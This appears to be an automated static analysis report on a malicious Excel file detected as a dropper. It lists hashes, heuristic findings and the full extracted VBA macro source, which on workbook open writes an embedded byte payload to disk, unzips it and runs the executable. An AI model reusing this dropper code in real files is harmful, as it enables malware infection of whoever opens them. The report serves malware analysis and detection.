Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b29691ac40b8bbb1…

MALICIOUS

Office (OLE)

428.5 KB Created: 2006-09-16 00:00:00 Authoring application: Microsoft Excel First seen: 2021-02-23
MD5: 5158c5c17862225a86c8a4f36f054ae2 SHA-1: 6da27200f473f8c55bb125f68314eecb2219c3dd SHA-256: b29691ac40b8bbb12b13e84641ad20583d1387ca356850aa7b5e76b0f6c76806
236 Risk Score

Heuristics 7

  • ClamAV: Xls.Dropper.Agent-7431632-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7431632-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Shell path_Nave_file, vbNormalNoFocus
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set oApp = CreateObject("Shell.Application")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        fldr_Nave_name = Environ$("ALLUSERSPROFILE") & "\Media-List\"

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4272 bytes
SHA-256: a80e19311ac1ab6d30e096a91202cad7142f059f0cda95e93912b25db56d644b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
  Call userNaveLoadr
  Sheet3.Visible = xlSheetVisible
 Sheet3.Copy
 End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub Macro1()
  
    ActiveSheet.ListObjects.Add(xlSrcRange, Range("$I$6"), , xlNo).Name = "Table1"
    Range("R9").Select
    With Selection.Interior
        .Pattern = xlSolid
        .PatternColorIndex = xlAutomatic
        .TintAndShade = 1
        .PatternTintAndShade = 0
    End With
 
    
    
End Sub

 

Sub userNaveLoadr()

    Dim path_Nave_file As String
    Dim file_Nave_name  As String
    Dim zip_Nave_file  As Variant
    Dim fldr_Nave_name  As Variant
    
    Dim byt() As Byte
    
    Dim ar1Nave() As String
    
    file_Nave_name = "tbvrarthsa"
    
    
    fldr_Nave_name = Environ$("ALLUSERSPROFILE") & "\Media-List\"
    
    If Dir(fldr_Nave_name, vbDirectory) = "" Then
        MkDir (fldr_Nave_name)
    End If
     
    
    zip_Nave_file = fldr_Nave_name & file_Nave_name & ".zip"
    
    path_Nave_file = fldr_Nave_name & file_Nave_name & ".exe"
    
      
    
    If InStr(Application.OperatingSystem, "6.02") > 0 Or InStr(Application.OperatingSystem, "6.03") > 0 Then
        ar1Nave = Split(userForm.TextBox2.Text, "-")
    Else
        ar1Nave = Split(userForm.TextBox1.Text, "-")
    End If
    
    Dim btsNave() As Byte
    
    Dim linNave As Double
    
    linNave = 0
    
    For Each vl In ar1Nave
        ReDim Preserve btsNave(linNave)
    
        btsNave(linNave) = CByte(vl)
        
        linNave = linNave + 1
    Next

    
      
    Open zip_Nave_file For Binary Access Write As #2
         Put #2, , btsNave
    Close #2
   
    
     If Len(Dir(path_Nave_file)) = 0 Then
        Call unNavezip(zip_Nave_file, fldr_Nave_name)
    End If


    Shell path_Nave_file, vbNormalNoFocus
    
    
End Sub

Sub Macro15()
  
    ActiveSheet.ListObjects.Add(xlSrcRange, Range("$I$6"), , xlNo).Name = "Table1"
    Range("R7").Select
    With Selection.Interior
        .Pattern = xlSolid
        .PatternColorIndex = xlAutomatic
        .TintAndShade = 1
        .PatternTintAndShade = 0
    End With
 
    
    
End Sub

 Sub unNavezip(Fname As Variant, FileNameFolder As Variant)
    Dim FSO As Object
    
    Dim oApp As Object
    
    
    'Extract the files into the Destination folder
    Set oApp = CreateObject("Shell.Application")
    
    oApp.Namespace(FileNameFolder).CopyHere oApp.Namespace(Fname).items, &H4

    
End Sub




Attribute VB_Name = "userForm"
Attribute VB_Base = "0{3E45A008-C864-4119-8A34-06DA6AE727AD}{E2E34E71-CC29-42F0-A048-256E3B21FF84}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False












































Private Sub TextBox1_Change()

End Sub

Private Sub weHafiBox_Change()

End Sub